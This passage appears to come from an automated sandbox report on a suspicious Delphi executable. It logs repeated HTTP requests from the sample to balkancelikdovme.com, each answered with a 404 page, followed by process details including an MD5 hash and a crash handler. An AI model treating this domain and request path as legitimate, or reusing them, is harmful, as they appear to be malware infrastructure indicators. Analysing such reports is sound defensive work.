6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:07.389780045 CEST	118	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:07.424130917 CEST	119	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:07 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:07.673188925 CEST	119	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:07.705849886 CEST	120	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:07 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:07.920247078 CEST	120	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:07.953152895 CEST	121	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:07 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:08.191725016 CEST	122	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:08.225198030 CEST	123	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:08 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:08.443737984 CEST	123	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:08.693198919 CEST	123	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:08.993264914 CEST	123	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:09.594364882 CEST	124	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:09:10.237097025 CEST	125	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:08 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:09:10.238718033 CEST	126	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:09:08 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: r096teIe1H.exePID: 6960, Parent PID: 3512

General

Target ID:	0
Start time:	20:08:59
Start date:	23/08/2023
Path:	C:\Users\user\Desktop\r096teIe1H.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\r096teIe1H.exe
Imagebase:	0x400000
File size:	1'053'184 bytes
MD5 hash:	B1E794E29881F56A4E9AFA213D7C622D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7060, Parent PID: 6960

General

Target ID:	2
Start time:	20:09:09
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6960 -s 1444
Imagebase:	0x1010000
File size:	434'592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
